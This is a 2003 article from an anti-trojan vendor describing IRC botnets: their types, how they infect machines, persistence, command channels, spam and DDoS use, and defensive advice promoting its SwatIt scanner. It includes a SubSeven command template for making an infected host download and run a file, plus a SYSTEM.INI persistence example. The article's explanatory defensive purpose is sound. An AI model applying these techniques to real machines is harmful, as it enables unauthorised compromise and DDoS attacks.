SwatIt Anti Trojan and Bot Scanner and Remover
BOTS
Bots, Drones, Zombies, Worms and other things that go bump in the night.









 

 
  • 1. What Is A Bot and What Is A Bot Not.
  • 2. Chronology of IRC Bots.
  • 3. The Distinct Types Of Bots.
  • 4. The Stages Of Bot Distribution and Infection.
  • a.Infection Techniques.
  • b.The Intitial Infection.
  • c.The Bots Report For Duty.
  • d.Ordering and Controlling The New Army.
  • e.Green Eggs And Spam.
  • f. Keeping The Army On The Move And Hiding Them.
  • 5. Conclusions
  • a.Be Reasonably Paranoid
  • b.Use Current And Updated Anti Trojan Software.
  • 6. Interviews Where We Leave Absolutely No Stone Unturned.
  • a.Interview With Dalnet IRC Operator Fruit^Loop
  • b.Interview With Dalnet IRC Operator Barbara
  • c.Interview With Dalnet IRC Operator Melech
  • c.Interview With Dalnet #NoHack Operator Golcor
  • d.Interview With Mobman The Author Of SubSeven
  • e. Interview With Wicked
  • 7. Analysis
  • a.GT Bot Analysis
  • b.Analysis Of Single Binary Bots. Coming Soon.
  • c.Analysis Of Socket Clone Bots. Coming Soon.
  • 8. Screen Captures And Logs
  • a.Screen Capture Gallery
  • b.IRC Channel Activity Logs

1. What Is A Bot and What Is A Bot Not.

Firstly the term Bot is derived from the word Robot which in turn is derived from the Czechoslovakian word "robota" which simply means work. Bot is a generic term and is used to describe an automatom or automated process in both the real world and the computer world. Search engines use Bots to spider websites with and online games such as Quake use Bots as artificial opponents. Bots do not need to eat, drink or sleep and will relentlessly do their masters bidding until told to stop. The Bots we are covering are IRC Bots and they operate in much the same manner. Bots are often also commonly referred to as Zombies or Drones which are incorrect terms mainly used by the media as it creates a much more fearsome image. One of the first bots written for Unix machines was released as Eggdrop Bot, by which it is still known today. I am informed by the current head of development for Eggdrop Bot, Jeff Fisher that Eggdrop was first created in 1993 and can be downloaded from www.eggheads.org. Various Trojan Bots also have bot in the name given to it by the authors, for example : SubSeven Bot, Bionet Bot, AttackBot, GT Bot, EvilBot and SlackBot to name just a few specimens. In actuality a Zombie is a Unix process which is dead and has not yet relinquished it's process table slot, rather like a ghost. Furthermore, a drone is similar to a zombie and is also still not an accurate description of an IRC Bot.

2. Chronology of IRC Bots

IRC Bots have existed for many years now and are certainly by any means a new discovery. Eggdrop Bot for all flavors of Unix have been around several years and were usually used to protect IRC channels in the owner's absence. Generally these Bots are used for valid and useful purposes but as you can create your own TCL scripts, they have much scope to also be used for malicious purposes. Versions of Eggdrop Bot for Windows also exist under the name of Win Eggdrop. I have seen several versions for Windows that have been patched so that they run as an invisible process (as a Trojan). More information on Eggdrop Bots along with a full range of scripts can be found at www.eggheads.org Malicious Trojan Bots for Windows have existed for at least four years with early know versions being Bots such as, AttackBot,
which was a precursor to the Subseven Bot. The knowledge gained from the development of AttackBot along with the code was applied in a condensed form into the Subseven Bot. You can find a description, or be it not an accurate description of AttackBot at Dark-e and information regarding the Subseven Trojan. Past articles have been written about specific types of Trojans that connect to IRC and launch DDOS (distributed denial of service) and one very good article on the subject can be found at Idefense read the PDF Adobe Acrobat file and also read this article by Idefense This article is an analysis of Subseven Trojan's ability to launch DDOS and although covering a version of Subseven that is now nearly two years old and a little outdated, but was and still is very accurate in its assessment.

3. The Distinct Types of Bots.

IRC Bots come in several different flavors and for several different operating systems. For Windows, there are three specific types of Bots,
(1.) Bots that consist of a single binary, such as AttackBot, SubSeven, EvilBot, SlackBot etc.
(2.) Bots that use one or more binaries and open source script files normally based around mIRC 32 and commonly referred to as GT Bot (Global Threat) which we cover in a lot more detail here URL?? as they are the easiest to edit and create new variants of due to their being open source mIRC scripted files.
(3.) Bots that are a backdoor in another program such as Socket Clone Bots in mIRC which when you open mIRC makes two connections to the server instead of the normal one connection. Scripted Worms such as Judgement Day created Socket Clones to propogate themselves.

4. The Stages Of Bot Distribution and Infection.

(a.) Contrary to popular belief Email attachments are not the most popular or effective way to spread Trojans. How many Trojans do you get in your Email account each day? Join any popular IRC server and you will recieve a whole plethora of DCC filesends or adverts for web sites with infectious downloads or even infectious HTML using the Active-X exploit for Microsoft Internet Explorer. If your browser is not patched against these exploits it is very easy to drop a small Trojan onto the machine that visits the web page. This exploit is limited and only files less than 34 kb can be dropped. IRC Bots of less than 10 kb compressed do exist and can easily be dropped (EvilBot is a mere 7kb when compressed with UPX).

We have put together a demonstration of the browser exploit here and you can safely test your browser to see if you are affected by visiting this link that we have created. URL If you are affected you will need to install the Microsoft critical update immediately. A lot of the dropped files are Web Download Trojans which are a one shot deal. Once executed they invisibly get a predetermined file from the web and execute it. This is how larger Bots or Trojans are installed onto machines. Simply the best way to infect a machine is to use an exploit or existing exploit so the user does not see or suspect anything. If you were sent a file that when you ran it nothing appeared to happen you would very likely be suspicious or know you most likely just ran a Trojan.

A great many Bots scan for victims of other Trojans such as SubSeven. This has two distinct advantages for the hacker. Firstly they can scan a lot of class C blocks without scanning themselves or wasting their own bandwidth to do so and secondly they can get their Bot onto already Trojan infected machines on the premise that if the owner did not know they had one Trojan that is detectable by nearly all Anti Trojan/Virus applications then they certainly won't know they have another that is undetectable by signature by all of these applications. This to a large degree is why we use Generics as a second layer of defense against unknown Trojans. The SubSeven scan yields victims on default ports and also exploits the old SubSeven master password which works on all SubSeven 2.* versions upto and not including SubSeven 2.1.3 Bonus. Once a victim has been found and logged into using the command (UFUhttp://downloadlocation.com/filetodownload.exe) to update from the web is sent. Once received SubSeven will download the new file and run it and then remove itself.

The Leave Trojan/Worm was a recent specimen that exploited this loophole. URL Another common trick lately has been to scan for Exploitable Windows 2000 IIS (Internet Information Server) machines and use Unicode exploits to Spawn an FTP server that can be uploaded with a Trojan of choice.

We recently discovered a Botnet with just over 1800 of these machines active and online at any time, again these were Windows 2000 machines with the IIS vulnerability. Considering that all the infected hosts are not likely to all be online at the same time this makes for a rather large Botnet. The binary they were running was quite crude but could generate a lot of malicious traffic especially as a lot of the hosts had broadband connections or were *.EDU (University Hosts). These particular Bots were used effectively against EFNET (Eris Free Network) which is a group of linked IRC Chat Servers in a recent DDOS (Distributed Denial Of Service) generating huge amounts of malicious traffic to down the IRC Servers.

Bots are also configured to generate clones (Multiple incidences of themselves) that join other IRC Servers and mass spam message users with URL's for infectious downloads. These most commonly come in the form of fake warning alerting the user they have an autosending Worm, Trojan or Virus infection or as an advert for a free sex site along with a few other disguises.

We recently witnessed a Botnet of just over 7000 infected machines all infected with not one but two different Bots, both GT Bot and Litmus Bot which were spread by spamming IRC users and by autosends. Once infected with the Web Download Trojan the infected machine would download a packaged executable created by a program called PaquetBuilder32 and execute it. This would install a GT Bot that connects to IRC.Dal.Net and joins target channels and autosends by DCC (Direct Client To Client Protocol) a copy of the Web Downloader Trojan which infects more machines. This works in two parts with one Bot infecting other users to create more Bots and the other logging onto a different IRC server to report for duty for DDoS attacks. Over the course of our studies we have collected and assimilated a lot of information and IRC channel logs and screen captures showing alsorts of different Bot activity including DDoS attacks.

(b.) Once the Trojan is run it secretly installs itself and creates a method to restart itself. Commonly used is the WIN.INI run = or load= lines or the SYSTEM.INI under shell= after explorer.exe eg. (shell=explorer.exe ,trojanbot.exe) or loads from the Registry or Start Up folder.

(c.) When installed and running the Bot will attempt to connect to an IRC Server on a pre designated port. The most common connection port to attempt connection to is the default Port 6667. It should also be considered that IRC Servers usually listen on several other ports by default including 6660, 6661, 6662, 6663, 6664, 6665, 6666, 6668, 6669 and 7000. These other ports are often used so that the more commonly known Port 6667 is not shown in Netstat as a remote port that the computer is connected to.

Another thing that should be noted is that an IRC Server is not limited to the ports listed above an in fact can be set to listen on any port for connections. IRCD versions for Windows are often configured to run on Port 80 or othe similar ports which wont arouse too much suspicion as a remote port connection. Some BotNets run Trojanized Windows IRCDs such as Unreal IRCD 3.0 for Windows which has been adapted to run as a hidden task under the process name Coresrv.exe and it loads Coresrv.dat as the IRCD configuration file. This enables BotNets to be hidden on non public providers machines which are a lot harder to have removed than a simple complaint to a shell host provider. The user must first be contacted which is no easy task especially when having to do it through the ISP which often has little or no conception of what this stuff is or how it works. They most probably think email of complaint are the ravings of some mad man with an overactive imagination and who could blame them as a lot of it sounds too fantastic to be true.

Most BotNets are however forced to join public or private IRC Servers hosted by commercial shell hosting companies operating on a Unix flavoured operating platform.

Once connected to IRC the Bot will log into the predetermined rendezvous channel to await further instructions from it's Master.

(d.) Often as these Bots join the IRC channel the Master will log into them with a special and sometimes encrypted access password. This ensures that the Bots cannot be controlled by other people and makes it harder for someone to hijack the BotNet. After the login has been accepted if indeed it was required the Bots are now ready to be put to work. Our screen capture archive which we obtained from undercover surveillance shows much activity going on in these Bot channels with lots of DDoS attacks and IRC floods being invoked. Even as I write I am witnessing channels being heavily flooded on DALnet by floods of GT Bots which hardly display any of the traits of sluggish and lifeless Zombies. As I sit here so far over 50 different channels have been brought to a stand still by huge floods of data where the Bot connects, sends a message to the channel and immediately disconnects and then reconnects and performs the action repeatedly in a loop until ordered to stop on the remote server. As this is of extra added interest I have decided to also include screenshots of both the remote IRC channel where the orders are given and one of the channels which were attacked. The attack being launched here and the results of the attack and what the victims saw here. The screen captures from when I joined the channel to observe the BotNet. here and here show the number of GT Bots in each of the channels. The channel modes should be also noted which appear in the title bar of the channel window as +mnprtu which is set that way to hide the nicknames of the Bots in the channel from the user list on the right hand side of the image. We will be covering channel moding and what these modes mean and do in section 4 (f.) of this article.

(e.) An idea of how Bots are used to spam becomes obvious when you look at this image here showing GT Bots being commanded to spam a remote IRC Network with fake virus warnings urging people to go and download a fake cure which will make them become infected with a GT Bot. This is a common and effective strategy amongst BotNet owners to play on normal users fears and concerns. These Bots are normally joined into popular channels with several hundred people in them and message everybody as they join with a spam message such as the one in the above image. They are able to generate huge amounts of spam per session and infect many users that increase the head count of the BotNet and of course make any attacks launched more devastating.

(f.) BotNets often draw attention to themselves by traffic patterns which are soon picked up on by vigilant IRC Administrators or Shell Providers and the channels they join closed or the shell account removed due to abuse complaint. If they joined a fixed IRC Server name or IP address the likelihood is that they would all be lost from some basic action on the part of the service providers.

This is why BotNets often follow dynamic hosts which are quick and easy to edit to repoint the entire army elsewhere if accidently stumbled upon or banned from an IRC Server or channel. If the dynamic address that the Bots follow can be identified then it is not too hard to complain to the provider of the dynamic account and request that it be null routed. The smart money is always on going after the dynamic DNS if you can recover the information as to which dynamic it is using.

A common provider of free dynamic accounts is dyndns.org . These accounts can be and are used for many legitimate purposes but are also unfortunately prone to misuse by some users. Dyndns has strong terms of service governing these accounts and abuse of them. In our experiences with dyndns the abuse department rigidly enforces their policies and terminates abused accounts promptly when proof of abuse is provided. You will find here one example of how abuse was handled without a report even being made to the abuse department. here

When the Bots are connected to the IRC Server the channel they join is usually set with various channel modes to restrict access or help stealth the fact that the channel or the occupants of the channel are there. Unreal IRCD which is a popular choice with BotNet Masters covers the channel modes in it's own commands document so I will refer to that rather than do a complete rewrite. here You may notice from the images in the gallery here the modes the channel is set at and be able to quickly reference them from the Unreal IRCD document about halfway down.

Typically the channels will be set with these modes at least.

+s (secret : cannot be seen in channels list)

+u (userlist is hidden)

+m (moderated : a user cannot send text to that channel unless they have operator @ access or +v voice)

+k (cannot enter the channel unless you know the correct key)

5. Conclusions.

(a.) People should be reasonably paranoid about accepting any files over the Internet from chatrooms or visiting web sites that they do not know without at least checking that their web browser is updated with the latest critical updates if they use Microsoft Internet Explorer. Test the security of your Internet Explorer here. Many files are spread on IRC as *.MPEG.zip or *.MPEG.exe and other similar names to fool people into accepting them. Even scanning files with Anti Virus scanners is not always good enough defense as unknown Trojans would not be identified. Additional references here , here and here.

You can also download our Totally FREE Trojan, Bot, Zombie and Worm Scanner Swat It from here

(b.) It is very important to remember that no matter what Anti Virus or Trojan software that you use that you keep it regularly updated as new Trojans appear on a daily basis. A check for file signature updates should be done on a daily basis unless you are using our software which negates the need to check as it auto updates automatically when new file signatures are available.



You can download and try SwatIt now free of charge by clicking
on the download link on the left.

Infected With Karma Worm and Sending Spam Messages
on IRC? click here

home - about - screenshots - links - contact

©2003 SwatIt.Org